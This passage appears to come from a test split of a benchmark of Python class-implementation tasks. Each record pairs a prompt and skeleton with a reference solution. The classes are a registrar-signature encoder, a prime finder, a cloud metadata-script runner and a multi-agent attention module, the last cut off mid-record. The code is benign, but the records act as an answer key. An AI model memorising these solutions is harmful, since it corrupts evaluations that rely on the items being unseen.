encoded_string.decode('utf-8')"], "bodies_text": "<|body_start_0|>\n filing_effective_date = filing_effective_date.replace(tzinfo=None)\n registrar = [x for x in RegistrarInfo.registrar_info if filing_effective_date >= datetime.datetime.strptime(x['startDate'], '%Y-%m-%dT%H:%M:%S') and (x['endDate'] is None or filing_effective_date <= datetime.datetime.strptime(x['endDate'], '%Y-%m-%dT%H:%M:%S'))][0]\n signature = RegistrarInfo.encode_registrar_signature(registrar['signatureImage'])\n registrar['signature'] = f'data:image/png;base64,{signature}'\n if registrar['signatureImageAndText']:\n signature_and_text = RegistrarInfo.encode_registrar_signature(registrar['signatureImageAndText'])\n registrar['signatureAndText'] = f'data:image/png;base64,{signature_and_text}'\n return registrar\n<|end_body_0|>\n\n<|body_start_1|>\n template_path = current_app.config.get('REPORT_TEMPLATE_PATH')\n image_path = f'{template_path}/registrar_signatures/{signature_image}'\n with open(image_path, 'rb') as image_file:\n encoded_string = base64.b64encode(image_file.read())\n return encoded_string.decode('utf-8')\n<|end_body_1|>\n", "class_docstring": "Utility to get the relevant registrar info for a filing.", "class_name": "RegistrarInfo", "detected_licenses": ["Apache-2.0"], "format_version": "stack_v2_sparse_python_classes_v1", "full_text": "<|skeleton|>\nclass RegistrarInfo:\n \"\"\"Utility to get the relevant registrar info for a filing.\"\"\"\n\n def get_registrar_info(filing_effective_date) -> dict:\n \"\"\"Return the registrar for a filing.\"\"\"\n <|body_0|>\n\n def encode_registrar_signature(signature_image) -> str:\n \"\"\"Return the encoded registrar signature.\"\"\"\n <|body_1|>\n\n<|end_skeleton|>\n\n<|body_start_0|>\n filing_effective_date = filing_effective_date.replace(tzinfo=None)\n registrar = [x for x in RegistrarInfo.registrar_info if filing_effective_date >= datetime.datetime.strptime(x['startDate'], '%Y-%m-%dT%H:%M:%S') and (x['endDate'] is None or filing_effective_date <= datetime.datetime.strptime(x['endDate'], '%Y-%m-%dT%H:%M:%S'))][0]\n signature = RegistrarInfo.encode_registrar_signature(registrar['signatureImage'])\n registrar['signature'] = f'data:image/png;base64,{signature}'\n if registrar['signatureImageAndText']:\n signature_and_text = RegistrarInfo.encode_registrar_signature(registrar['signatureImageAndText'])\n registrar['signatureAndText'] = f'data:image/png;base64,{signature_and_text}'\n return registrar\n<|end_body_0|>\n\n<|body_start_1|>\n template_path = current_app.config.get('REPORT_TEMPLATE_PATH')\n image_path = f'{template_path}/registrar_signatures/{signature_image}'\n with open(image_path, 'rb') as image_file:\n encoded_string = base64.b64encode(image_file.read())\n return encoded_string.decode('utf-8')\n<|end_body_1|>\n", "id": "stack_v2_sparse_classes_10k_test_000149", "length_bytes": 3514, "license_type": "permissive", "methods": [{"docstring": "Return the registrar for a filing.", "name": "get_registrar_info", "signature": "def get_registrar_info(filing_effective_date) -> dict"}, {"docstring": "Return the encoded registrar signature.", "name": "encode_registrar_signature", "signature": "def encode_registrar_signature(signature_image) -> str"}], "n_methods": 2, "prompt": "Implement the Python class `RegistrarInfo` described below.\n\nClass description:\nUtility to get the relevant registrar info for a filing.\n\nMethod signatures and docstrings:\n- def get_registrar_info(filing_effective_date) -> dict: Return the registrar for a filing.\n- def encode_registrar_signature(signature_image) -> str: Return the encoded registrar signature.", "prompted_full_text": "Implement the Python class `RegistrarInfo` described below.\n\nClass description:\nUtility to get the relevant registrar info for a filing.\n\nMethod signatures and docstrings:\n- def get_registrar_info(filing_effective_date) -> dict: Return the registrar for a filing.\n- def encode_registrar_signature(signature_image) -> str: Return the encoded registrar signature.\n\n<|skeleton|>\nclass RegistrarInfo:\n \"\"\"Utility to get the relevant registrar info for a filing.\"\"\"\n\n def get_registrar_info(filing_effective_date) -> dict:\n \"\"\"Return the registrar for a filing.\"\"\"\n <|body_0|>\n\n def encode_registrar_signature(signature_image) -> str:\n \"\"\"Return the encoded registrar signature.\"\"\"\n <|body_1|>\n\n<|end_skeleton|>\n\n<|body_start_0|>\n filing_effective_date = filing_effective_date.replace(tzinfo=None)\n registrar = [x for x in RegistrarInfo.registrar_info if filing_effective_date >= datetime.datetime.strptime(x['startDate'], '%Y-%m-%dT%H:%M:%S') and (x['endDate'] is None or filing_effective_date <= datetime.datetime.strptime(x['endDate'], '%Y-%m-%dT%H:%M:%S'))][0]\n signature = RegistrarInfo.encode_registrar_signature(registrar['signatureImage'])\n registrar['signature'] = f'data:image/png;base64,{signature}'\n if registrar['signatureImageAndText']:\n signature_and_text = RegistrarInfo.encode_registrar_signature(registrar['signatureImageAndText'])\n registrar['signatureAndText'] = f'data:image/png;base64,{signature_and_text}'\n return registrar\n<|end_body_0|>\n\n<|body_start_1|>\n template_path = current_app.config.get('REPORT_TEMPLATE_PATH')\n image_path = f'{template_path}/registrar_signatures/{signature_image}'\n with open(image_path, 'rb') as image_file:\n encoded_string = base64.b64encode(image_file.read())\n return encoded_string.decode('utf-8')\n<|end_body_1|>\n", "revision_id": "d90f11a7b14411b02c07fe97d2c1fc31cd4a9b32", "skeleton": "<|skeleton|>\nclass RegistrarInfo:\n \"\"\"Utility to get the relevant registrar info for a filing.\"\"\"\n\n def get_registrar_info(filing_effective_date) -> dict:\n \"\"\"Return the registrar for a filing.\"\"\"\n <|body_0|>\n\n def encode_registrar_signature(signature_image) -> str:\n \"\"\"Return the encoded registrar signature.\"\"\"\n <|body_1|>\n\n<|end_skeleton|>", "snapshot_name": "stack_v2_sparse_classes_10k", "snapshot_source_dir": "data/stack_v2_sparse_classes_30k", "solution": "class RegistrarInfo:\n \"\"\"Utility to get the relevant registrar info for a filing.\"\"\"\n\n def get_registrar_info(filing_effective_date) -> dict:\n \"\"\"Return the registrar for a filing.\"\"\"\n filing_effective_date = filing_effective_date.replace(tzinfo=None)\n registrar = [x for x in RegistrarInfo.registrar_info if filing_effective_date >= datetime.datetime.strptime(x['startDate'], '%Y-%m-%dT%H:%M:%S') and (x['endDate'] is None or filing_effective_date <= datetime.datetime.strptime(x['endDate'], '%Y-%m-%dT%H:%M:%S'))][0]\n signature = RegistrarInfo.encode_registrar_signature(registrar['signatureImage'])\n registrar['signature'] = f'data:image/png;base64,{signature}'\n if registrar['signatureImageAndText']:\n signature_and_text = RegistrarInfo.encode_registrar_signature(registrar['signatureImageAndText'])\n registrar['signatureAndText'] = f'data:image/png;base64,{signature_and_text}'\n return registrar\n\n def encode_registrar_signature(signature_image) -> str:\n \"\"\"Return the encoded registrar signature.\"\"\"\n template_path = current_app.config.get('REPORT_TEMPLATE_PATH')\n image_path = f'{template_path}/registrar_signatures/{signature_image}'\n with open(image_path, 'rb') as image_file:\n encoded_string = base64.b64encode(image_file.read())\n return encoded_string.decode('utf-8')\n", "source": "the_stack_v2_python_sparse", "source_path": "legal-api/src/legal_api/reports/registrar_meta.py", "source_repo": "bcgov/lear", "split": "test", "star_events_count": 13} {"blob_id": "85f6893ae854200ee989d5b43f217b37f645c7ba", "bodies": ["if number in (0, 1):\n return False\nif number < 0:\n return False\nfor element in range(2, number):\n if number % element == 0:\n return False\nreturn True", "index = number\nwhile True:\n index += 1\n if self.is_prime(index):\n print('The next prime after {0} is {1}'.format(number, index))\n return index"], "bodies_text": "<|body_start_0|>\n if number in (0, 1):\n return False\n if number < 0:\n return False\n for element in range(2, number):\n if number % element == 0:\n return False\n return True\n<|end_body_0|>\n\n<|body_start_1|>\n index = number\n while True:\n index += 1\n if self.is_prime(index):\n print('The next prime after {0} is {1}'.format(number, index))\n return index\n<|end_body_1|>\n", "class_docstring": "", "class_name": "Prime", "detected_licenses": [], "format_version": "stack_v2_sparse_python_classes_v1", "full_text": "<|skeleton|>\nclass Prime:\n\n def is_prime(self, number):\n \"\"\"Return True if *number* is prime.\"\"\"\n <|body_0|>\n\n def print_next_prime(self, number):\n \"\"\"Print the closest prime number larger than *number*.\"\"\"\n <|body_1|>\n\n<|end_skeleton|>\n\n<|body_start_0|>\n if number in (0, 1):\n return False\n if number < 0:\n return False\n for element in range(2, number):\n if number % element == 0:\n return False\n return True\n<|end_body_0|>\n\n<|body_start_1|>\n index = number\n while True:\n index += 1\n if self.is_prime(index):\n print('The next prime after {0} is {1}'.format(number, index))\n return index\n<|end_body_1|>\n", "id": "stack_v2_sparse_classes_10k_test_000150", "length_bytes": 793, "license_type": "no_license", "methods": [{"docstring": "Return True if *number* is prime.", "name": "is_prime", "signature": "def is_prime(self, number)"}, {"docstring": "Print the closest prime number larger than *number*.", "name": "print_next_prime", "signature": "def print_next_prime(self, number)"}], "n_methods": 2, "original_id": "stack_v2_sparse_classes_30k_train_000939", "prompt": "Implement the Python class `Prime` described below.\n\nClass description:\nImplement the Prime class.\n\nMethod signatures and docstrings:\n- def is_prime(self, number): Return True if *number* is prime.\n- def print_next_prime(self, number): Print the closest prime number larger than *number*.", "prompted_full_text": "Implement the Python class `Prime` described below.\n\nClass description:\nImplement the Prime class.\n\nMethod signatures and docstrings:\n- def is_prime(self, number): Return True if *number* is prime.\n- def print_next_prime(self, number): Print the closest prime number larger than *number*.\n\n<|skeleton|>\nclass Prime:\n\n def is_prime(self, number):\n \"\"\"Return True if *number* is prime.\"\"\"\n <|body_0|>\n\n def print_next_prime(self, number):\n \"\"\"Print the closest prime number larger than *number*.\"\"\"\n <|body_1|>\n\n<|end_skeleton|>\n\n<|body_start_0|>\n if number in (0, 1):\n return False\n if number < 0:\n return False\n for element in range(2, number):\n if number % element == 0:\n return False\n return True\n<|end_body_0|>\n\n<|body_start_1|>\n index = number\n while True:\n index += 1\n if self.is_prime(index):\n print('The next prime after {0} is {1}'.format(number, index))\n return index\n<|end_body_1|>\n", "revision_id": "2965199d439b5cf4d9074f9c43240bef457218f4", "skeleton": "<|skeleton|>\nclass Prime:\n\n def is_prime(self, number):\n \"\"\"Return True if *number* is prime.\"\"\"\n <|body_0|>\n\n def print_next_prime(self, number):\n \"\"\"Print the closest prime number larger than *number*.\"\"\"\n <|body_1|>\n\n<|end_skeleton|>", "snapshot_name": "stack_v2_sparse_classes_10k", "snapshot_source_dir": "data/stack_v2_sparse_classes_30k", "solution": "class Prime:\n def is_prime(self, number):\n \"\"\"Return True if *number* is prime.\"\"\"\n if number in (0, 1):\n return False\n if number < 0:\n return False\n for element in range(2, number):\n if number % element == 0:\n return False\n return True\n\n def print_next_prime(self, number):\n \"\"\"Print the closest prime number larger than *number*.\"\"\"\n index = number\n while True:\n index += 1\n if self.is_prime(index):\n print('The next prime after {0} is {1}'.format(number, index))\n return index\n", "source": "the_stack_v2_python_sparse", "source_path": "python_overview/python_unit_testing/primes.py", "source_repo": "truas/kccs", "split": "test", "star_events_count": 0} {"blob_id": "9e4eae77ec00fe1fcb0cf779812c6172876b0031", "bodies": ["self.script_type = script_type\nself.default_shell = default_shell\nname = '%s-script' % self.script_type\nfacility = logging.handlers.SysLogHandler.LOG_DAEMON\nself.logger = logger.Logger(name=name, debug=debug, facility=facility)\nself.retriever = script_retriever.ScriptRetriever(self.logger, script_type)\nself.executor = script_executor.ScriptExecutor(self.logger, script_type, default_shell=default_shell)\nself._RunScripts(run_dir=run_dir)", "with _CreateTempDir(self.script_type, run_dir=run_dir) as dest_dir:\n try:\n self.logger.info('Starting %s scripts.', self.script_type)\n script_dict = self.retriever.GetScripts(dest_dir)\n self.executor.RunScripts(script_dict)\n finally:\n self.logger.info('Finished running %s scripts.', self.script_type)"], "bodies_text": "<|body_start_0|>\n self.script_type = script_type\n self.default_shell = default_shell\n name = '%s-script' % self.script_type\n facility = logging.handlers.SysLogHandler.LOG_DAEMON\n self.logger = logger.Logger(name=name, debug=debug, facility=facility)\n self.retriever = script_retriever.ScriptRetriever(self.logger, script_type)\n self.executor = script_executor.ScriptExecutor(self.logger, script_type, default_shell=default_shell)\n self._RunScripts(run_dir=run_dir)\n<|end_body_0|>\n\n<|body_start_1|>\n with _CreateTempDir(self.script_type, run_dir=run_dir) as dest_dir:\n try:\n self.logger.info('Starting %s scripts.', self.script_type)\n script_dict = self.retriever.GetScripts(dest_dir)\n self.executor.RunScripts(script_dict)\n finally:\n self.logger.info('Finished running %s scripts.', self.script_type)\n<|end_body_1|>\n", "class_docstring": "A class for retrieving and executing metadata scripts.", "class_name": "ScriptManager", "detected_licenses": ["LicenseRef-scancode-generic-cla", "Apache-2.0"], "format_version": "stack_v2_sparse_python_classes_v1", "full_text": "<|skeleton|>\nclass ScriptManager:\n \"\"\"A class for retrieving and executing metadata scripts.\"\"\"\n\n def __init__(self, script_type, default_shell=None, run_dir=None, debug=False):\n \"\"\"Constructor. Args: script_type: string, the metadata script type to run. default_shell: string, the default shell to execute the script. run_dir: string, the base directory location of the temporary directory. debug: bool, True if debug output should write to the console.\"\"\"\n <|body_0|>\n\n def _RunScripts(self, run_dir=None):\n \"\"\"Retrieve metadata scripts and execute them. Args: run_dir: string, the base directory location of the temporary directory.\"\"\"\n <|body_1|>\n\n<|end_skeleton|>\n\n<|body_start_0|>\n self.script_type = script_type\n self.default_shell = default_shell\n name = '%s-script' % self.script_type\n facility = logging.handlers.SysLogHandler.LOG_DAEMON\n self.logger = logger.Logger(name=name, debug=debug, facility=facility)\n self.retriever = script_retriever.ScriptRetriever(self.logger, script_type)\n self.executor = script_executor.ScriptExecutor(self.logger, script_type, default_shell=default_shell)\n self._RunScripts(run_dir=run_dir)\n<|end_body_0|>\n\n<|body_start_1|>\n with _CreateTempDir(self.script_type, run_dir=run_dir) as dest_dir:\n try:\n self.logger.info('Starting %s scripts.', self.script_type)\n script_dict = self.retriever.GetScripts(dest_dir)\n self.executor.RunScripts(script_dict)\n finally:\n self.logger.info('Finished running %s scripts.', self.script_type)\n<|end_body_1|>\n", "id": "stack_v2_sparse_classes_10k_test_000151", "length_bytes": 4004, "license_type": "permissive", "methods": [{"docstring": "Constructor. Args: script_type: string, the metadata script type to run. default_shell: string, the default shell to execute the script. run_dir: string, the base directory location of the temporary directory. debug: bool, True if debug output should write to the console.", "name": "__init__", "signature": "def __init__(self, script_type, default_shell=None, run_dir=None, debug=False)"}, {"docstring": "Retrieve metadata scripts and execute them. Args: run_dir: string, the base directory location of the temporary directory.", "name": "_RunScripts", "signature": "def _RunScripts(self, run_dir=None)"}], "n_methods": 2, "original_id": "stack_v2_sparse_classes_30k_train_004498", "prompt": "Implement the Python class `ScriptManager` described below.\n\nClass description:\nA class for retrieving and executing metadata scripts.\n\nMethod signatures and docstrings:\n- def __init__(self, script_type, default_shell=None, run_dir=None, debug=False): Constructor. Args: script_type: string, the metadata script type to run. default_shell: string, the default shell to execute the script. run_dir: string, the base directory location of the temporary directory. debug: bool, True if debug output should write to the console.\n- def _RunScripts(self, run_dir=None): Retrieve metadata scripts and execute them. Args: run_dir: string, the base directory location of the temporary directory.", "prompted_full_text": "Implement the Python class `ScriptManager` described below.\n\nClass description:\nA class for retrieving and executing metadata scripts.\n\nMethod signatures and docstrings:\n- def __init__(self, script_type, default_shell=None, run_dir=None, debug=False): Constructor. Args: script_type: string, the metadata script type to run. default_shell: string, the default shell to execute the script. run_dir: string, the base directory location of the temporary directory. debug: bool, True if debug output should write to the console.\n- def _RunScripts(self, run_dir=None): Retrieve metadata scripts and execute them. Args: run_dir: string, the base directory location of the temporary directory.\n\n<|skeleton|>\nclass ScriptManager:\n \"\"\"A class for retrieving and executing metadata scripts.\"\"\"\n\n def __init__(self, script_type, default_shell=None, run_dir=None, debug=False):\n \"\"\"Constructor. Args: script_type: string, the metadata script type to run. default_shell: string, the default shell to execute the script. run_dir: string, the base directory location of the temporary directory. debug: bool, True if debug output should write to the console.\"\"\"\n <|body_0|>\n\n def _RunScripts(self, run_dir=None):\n \"\"\"Retrieve metadata scripts and execute them. Args: run_dir: string, the base directory location of the temporary directory.\"\"\"\n <|body_1|>\n\n<|end_skeleton|>\n\n<|body_start_0|>\n self.script_type = script_type\n self.default_shell = default_shell\n name = '%s-script' % self.script_type\n facility = logging.handlers.SysLogHandler.LOG_DAEMON\n self.logger = logger.Logger(name=name, debug=debug, facility=facility)\n self.retriever = script_retriever.ScriptRetriever(self.logger, script_type)\n self.executor = script_executor.ScriptExecutor(self.logger, script_type, default_shell=default_shell)\n self._RunScripts(run_dir=run_dir)\n<|end_body_0|>\n\n<|body_start_1|>\n with _CreateTempDir(self.script_type, run_dir=run_dir) as dest_dir:\n try:\n self.logger.info('Starting %s scripts.', self.script_type)\n script_dict = self.retriever.GetScripts(dest_dir)\n self.executor.RunScripts(script_dict)\n finally:\n self.logger.info('Finished running %s scripts.', self.script_type)\n<|end_body_1|>\n", "revision_id": "cf4b33214f770da2299923a5fa73d3d95f66ec35", "skeleton": "<|skeleton|>\nclass ScriptManager:\n \"\"\"A class for retrieving and executing metadata scripts.\"\"\"\n\n def __init__(self, script_type, default_shell=None, run_dir=None, debug=False):\n \"\"\"Constructor. Args: script_type: string, the metadata script type to run. default_shell: string, the default shell to execute the script. run_dir: string, the base directory location of the temporary directory. debug: bool, True if debug output should write to the console.\"\"\"\n <|body_0|>\n\n def _RunScripts(self, run_dir=None):\n \"\"\"Retrieve metadata scripts and execute them. Args: run_dir: string, the base directory location of the temporary directory.\"\"\"\n <|body_1|>\n\n<|end_skeleton|>", "snapshot_name": "stack_v2_sparse_classes_10k", "snapshot_source_dir": "data/stack_v2_sparse_classes_30k", "solution": "class ScriptManager:\n \"\"\"A class for retrieving and executing metadata scripts.\"\"\"\n\n def __init__(self, script_type, default_shell=None, run_dir=None, debug=False):\n \"\"\"Constructor. Args: script_type: string, the metadata script type to run. default_shell: string, the default shell to execute the script. run_dir: string, the base directory location of the temporary directory. debug: bool, True if debug output should write to the console.\"\"\"\n self.script_type = script_type\n self.default_shell = default_shell\n name = '%s-script' % self.script_type\n facility = logging.handlers.SysLogHandler.LOG_DAEMON\n self.logger = logger.Logger(name=name, debug=debug, facility=facility)\n self.retriever = script_retriever.ScriptRetriever(self.logger, script_type)\n self.executor = script_executor.ScriptExecutor(self.logger, script_type, default_shell=default_shell)\n self._RunScripts(run_dir=run_dir)\n\n def _RunScripts(self, run_dir=None):\n \"\"\"Retrieve metadata scripts and execute them. Args: run_dir: string, the base directory location of the temporary directory.\"\"\"\n with _CreateTempDir(self.script_type, run_dir=run_dir) as dest_dir:\n try:\n self.logger.info('Starting %s scripts.', self.script_type)\n script_dict = self.retriever.GetScripts(dest_dir)\n self.executor.RunScripts(script_dict)\n finally:\n self.logger.info('Finished running %s scripts.', self.script_type)\n", "source": "the_stack_v2_python_sparse", "source_path": "packages/python-google-compute-engine/google_compute_engine/metadata_scripts/script_manager.py", "source_repo": "GoogleCloudPlatform/compute-image-packages", "split": "test", "star_events_count": 329} {"blob_id": "9fe18658a43d2b99dd84819b1e9aa2b603f41a22", "bodies": ["super(CollaQSMACAttentionModule, self).__init__()\nself.self_feature_range = self_feature_range\nself.ally_feature_range = ally_feature_range\nself.attention_layer = CollaQMultiHeadAttention(1, q_dim, v_dim, attention_size, attention_size, attention_size)", "self_features = obs[:, :, :, self.self_feature_range[0]:self.self_feature_range[1]]\nally_features = obs[:, :, :, self.ally_feature_range[0]:self.ally_feature_range[1]]\nreturn (self_features, ally_features)", "obs = inputs\nself_features, ally_features = self._cut_obs(obs)\nT, B, A, _ = self_features.shape\nself_features = self_features.reshape(T * B * A, 1, -1)\nally_features = ally_features.reshape(T * B * A, A - 1, -1)\nself_features, ally_features = self.attention_layer(self_features, ally_features, ally_features)\nself_features = self_features.reshape(T, B, A, -1)\nally_features = ally_features.reshape(T, B, A, -1)\nobs = torch.cat([obs[:, :, :, :self.self_feature_range[0]], self_features, ally_features, obs[:, :, :, self.ally_feature_range[1]:]], dim=-1)\nreturn obs"], "bodies_text": "<|body_start_0|>\n super(CollaQSMACAttentionModule, self).__init__()\n self.self_feature_range = self_feature_range\n self.ally_feature_range = ally_feature_range\n self.attention_layer = CollaQMultiHeadAttention(1, q_dim, v_dim, attention_size, attention_size, attention_size)\n<|end_body_0|>\n\n<|body_start_1|>\n self_features = obs[:, :, :, self.self_feature_range[0]:self.self_feature_range[1]]\n ally_features = obs[:, :, :, self.ally_feature_range[0]:self.ally_feature_range[1]]\n return (self_features, ally_features)\n<|end_body_1|>\n\n<|body_start_2|>\n obs = inputs\n self_features, ally_features = self._cut_obs(obs)\n T, B, A, _ = self_features.shape\n self_features = self_features.reshape(T * B * A, 1, -1)\n ally_features = ally_features.reshape(T * B * A, A - 1, -1)\n self_features, ally_features = self.attention_layer(self_features, ally_features, ally_features)\n self_features = self_features.reshape(T, B, A, -1)\n ally_features = ally_features.reshape(T, B, A, -1)\n obs = torch.cat([obs[:, :, :, :self.self_feature_range[0]], self_features, ally_features, obs[:, :, :, self.ally_feature_range[1]:]], dim=-1)\n return obs\n<|end_body_2|>\n", "class_docstring": "Overview: Collaq attention module. Used to get agent's attention observation. It includes agent's observation and agent's part of the observation information of the agent's concerned allies Interface: __init__, _cut_obs, forward", "class_name": "CollaQSMACAttentionModule", "detected_licenses": ["Apache-2.0"], "format_version": "stack_v2_sparse_python_classes_v1", "full_text": "<|skeleton|>\nclass CollaQSMACAttentionModule:\n \"\"\"Overview: Collaq attention module. Used to get agent's attention observation. It includes agent's observation and agent's part of the observation information of the agent's concerned allies Interface: __init__, _cut_obs, forward\"\"\"\n\n def __init__(self, q_dim: int, v_dim: int, self_feature_range: List[int], ally_feature_range: List[int], attention_size: int):\n \"\"\"Overview: initialize collaq attention module Arguments: - q_dim (:obj:`int`): the dimension of transformer output q - v_dim (:obj:`int`): the dimension of transformer output v - self_features (:obj:`torch.Tensor`): output self agent's attention observation - ally_features (:obj:`torch.Tensor`): output ally agent's attention observation - attention_size (:obj:`int`): the size of attention net layer\"\"\"\n <|body_0|>\n\n def _cut_obs(self, obs: torch.Tensor):\n \"\"\"Overview: cut the observed information into self's observation and allay's observation Arguments: - obs (:obj:`torch.Tensor`): input each agent's observation Return: - self_features (:obj:`torch.Tensor`): output self agent's attention observation - ally_features (:obj:`torch.Tensor`): output ally agent's attention observation\"\"\"\n <|body_1|>\n\n def forward(self, inputs: torch.Tensor):\n \"\"\"Overview: forward computation to get agent's attention observation information Arguments: - obs (:obj:`torch.Tensor`): input each agent's observation Return: - obs (:obj:`torch.Tensor`): output agent's attention observation\"\"\"\n <|body_2|>\n\n<|end_skeleton|>\n\n<|body_start_0|>\n super(CollaQSMACAttentionModule, self).__init__()\n self.self_feature_range = self_feature_range\n self.ally_feature_range = ally_feature_range\n self.attention_layer = CollaQMultiHeadAttention(1, q_dim, v_dim, attention_size, attention_size, attention_size)\n<|end_body_0|>\n\n<|body_start_1|>\n self_features = obs[:, :, :, self.self_feature_range[0]:self.self_feature_range[1]]\n ally_features = obs[:, :, :, self.ally_feature_range[0]:self.ally_feature_range[1]]\n return (self_features, ally_features)\n<|end_body_1|>\n\n<|body_start_2|>\n obs = inputs\n self_features, ally_features = self._cut_obs(obs)\n T, B, A, _ = self_features.shape\n self_features = self_features.reshape(T * B * A, 1, -1)\n ally_features = ally_features.reshape(T * B * A, A - 1, -1)\n self_features, ally_features = self.attention_layer(self_features, ally_features, ally_features)\n self_features = self_features.reshape(T, B, A, -1)\n ally_features = ally_features.reshape(T, B, A, -1)\n obs = torch.cat([obs[:, :, :, :self.self_feature_range[0]], self_features, ally_features, obs[:, :, :, self.ally_feature_range[1]:]], dim=-1)\n return obs\n<|end_body_2|>\n", "id": "stack_v2_sparse_classes_10k_test_000152", "length_bytes": 27383, "license_type": "permissive", "methods": [{"docstring": "Overview: initialize collaq attention module Arguments: - q_dim (:obj:`int`): the dimension of transformer output q - v_dim (:obj:`int`): the dimension of transformer output v - self_features (:obj:`torch.Tensor`): output self agent's attention observation - ally_features (:obj:`torch.Tensor`): output ally agent's attention observation - attention_size (:obj:`int`): the size of attention net layer", "name": "__init__", "signature": "def __init__(self, q_dim: int, v_dim: int, self_feature_range: List[int], ally_feature_range: List[int], attention_size: int)"}, {"docstring": "Overview: cut the observed information into self's observation and allay's observation Arguments: - obs (:obj:`torch.Tensor`): input each agent's observation Return: - self_features (:obj:`torch.Tensor`): output self agent's attention observation - ally_features (:obj:`torch.Tensor`): output ally agent's attention observation", "name": "_cut_obs", "signature": "def _cut_obs(self, obs: torch.Tensor)"}, {"docstring": "Overview: forward computation to get agent's attention observation information Arguments: - obs (:obj:`torch.Tensor`): input each agent's observation Return: - obs (:obj:`torch.Tensor`): output agent's attention observation", "name": "forward", "signature": "def forward(self, inputs: torch.Tensor)"}], "n_methods": 3, "original_id": "stack_v2_sparse_classes_30k_train_007126", "prompt": "Implement the Python class `CollaQSMACAttentionModule` described below.\n\nClass description:\nOverview: Collaq attention module. Used to get agent's attention observation. It includes agent's observation and agent's part of the observation information of the agent's concerned allies Interface: __init__, _cut_obs, forward\n\nMethod signatures and docstrings:\n- def __init__(self, q_dim: int, v_dim: int, self_feature_range: List[int], ally_feature_range: List[int], attention_size: int): Overview: initialize collaq attention module Arguments: - q_dim (:obj:`int`): the dimension of transformer output q - v_dim (:obj:`int`): the dimension of transformer output v - self_features (:obj:`torch.Tensor`): output self agent's attention observation - ally_features (:obj:`torch.Tensor`): output ally agent's attention observation - attention_size (:obj:`int`): the size of attention net layer\n- def _cut_obs(self, obs: torch.Tensor): Overview: cut the observed information into self's observation and allay's observation Arguments: - obs (:obj:`torch.Tensor`): input each agent's observation Return: - self_features (:obj:`torch.Tensor`): output self agent's attention observation - ally_features (:obj:`torch.Tensor`): output ally agent's attention observation\n- def forward(self, inputs: torch.Tensor): Overview: forward computation to get agent's attention observation information Arguments: - obs (:obj:`torch.Tensor`): input each agent's observation Return: - obs (:obj:`torch.Tensor`): output agent's attention observation", "prompted_full_text": "Implement the Python class `CollaQSMACAttentionModule` described below.\n\nClass description:\nOverview: Collaq attention module. Used to get agent's attention observation. It includes agent's observation and agent's part of the observation information of the agent's concerned allies Interface: __init__, _cut_obs, forward\n\nMethod signatures and docstrings:\n- def __init__(self, q_dim: int, v_dim: int, self_feature_range: List[int], ally_feature_range: List[int], attention_size: int): Overview: initialize collaq attention module Arguments: - q_dim (:obj:`int`): the dimension of transformer output q - v_dim (:obj:`int`): the dimension of transformer output v - self_features (:obj:`torch.Tensor`): output self agent's attention observation - ally_features (:obj:`torch.Tensor`): output ally agent's attention observation - attention_size (:obj:`int`): the size of attention net layer\n- def _cut_obs(self, obs: torch.Tensor): Overview: cut the observed information into self's observation and allay's observation Arguments: - obs (:obj:`torch.Tensor`): input each agent's observation Return: - self_features (:obj:`torch.Tensor`): output self agent's attention observation - ally_features (:obj:`torch.Tensor`): output ally agent's attention observation\n- def forward(self, inputs: torch.Tensor): Overview: forward computation to get agent's attention observation information Arguments: - obs (:obj:`torch.Tensor`): input each agent's observation Return: - obs (:obj:`torch.Tensor`): output agent's attention observation\n\n<|skeleton|>\nclass CollaQSMACAttentionModule:\n \"\"\"Overview: Collaq attention module. Used to get agent's attention observation. It includes agent's observation and agent's part of the observation information of the agent's concerned allies Interface: __init__, _cut_obs, forward\"\"\"\n\n def __init__(self, q_dim: int, v_dim: int, self_feature_range: List[int], ally_feature_range: List[int], attention_size: int):\n \"\"\"Overview: initialize collaq attention module Arguments: - q_dim (:obj:`int`): the dimension of transformer output q - v_dim (:obj:`int`): the dimension of transformer output v - self_features (:obj:`torch.Tensor`): output self agent's attention observation - ally_features (:obj:`torch.Tensor`): output ally agent's attention observation - attention_size (:obj:`int`): the size of attention net layer\"\"\"\n <|body_0|>\n\n def _cut_obs(self, obs: torch.Tensor):\n \"\"\"Overview: cut the observed information into self's observation and allay's observation Arguments: - obs (:obj:`torch.Tensor`): input each agent's observation Return: - self_features (:obj:`torch.Tensor`): output self agent's attention observation - ally_features (:obj:`torch.Tensor`): output ally agent's attention observation\"\"\"\n <|body_1|>\n\n def forward(self, inputs: torch.Tensor):\n \"\"\"Overview: forward computation to get agent's attention observation information Arguments: - obs (:obj:`torch.Tensor`): input each agent's observation Return: - obs (:obj:`torch.Tensor`): output agent's attention observation\"\"\"\n <|body_2|>\n\n<|end_skeleton|>\n\n<|body_start_0|>\n super(CollaQSMACAttentionModule, self).__init__()\n self.self_feature_range = self_feature_range\n self.ally_feature_range = ally_feature_range\n self.attention_layer = CollaQMultiHeadAttention(1, q_dim, v_dim, attention_size, attention_size, attention_size)\n<|end_body_0|>\n\n<|body_start_1|>\n self_features = obs[:, :, :, self.self_feature_range[0]:self.self_feature_range[1]]\n ally_features = obs[:, :, :, self.ally_feature_range[0]:self.ally_feature_range[1]]\n return (self_features, ally_features)\n<|end_body_1|>\n\n<|body_start_2|>\n obs = inputs\n self_features, ally_features = self._cut_obs(obs)\n T, B, A, _ = self_features.shape\n self_features = self_features.reshape(T * B * A, 1, -1)\n ally_features = ally_features.reshape(T * B * A, A - 1, -1)\n self_features, ally_features = self.attention_layer(self_features, ally_features, ally_features)\n self_features = self_features.reshape(T, B, A, -1)\n ally_features = ally_features.reshape(T, B, A, -1)\n obs = torch.cat([obs[:, :, :, :self.self_feature_range[0]], self_features, ally_features, obs[:, :, :, self.ally_feature_range[1]:]], dim=-1)\n return obs\n<|end_body_2|>\n", "revision_id": "eb483fa6e46602d58c8e7d2ca1e566adca28e703", "skeleton": "<|skeleton|>\nclass CollaQSMACAttentionModule:\n \"\"\"Overview: Collaq attention module. Used to get agent's attention observation. It includes agent's observation and agent's part of the observation information of the agent's concerned allies Interface: __init__, _cut_obs, forward\"\"\"\n\n def __init__(self, q_dim: int, v_dim: int, self_feature_range: List[int], ally_feature_range: List[int], attention_size: int):\n \"\"\"Overview: initialize collaq attention module Arguments: - q_dim (:obj:`int`): the dimension of transformer output q - v_dim (:obj:`int`): the dimension of transformer output v - self_features (:obj:`torch.Tensor`): output self agent's attention observation - ally_features (:obj:`torch.Tensor`): output ally agent's attention observation - attention_size (:obj:`int`): the size of attention net layer\"\"\"\n <|body_0|>\n\n def _cut_obs(self, obs: torch.Tensor):\n 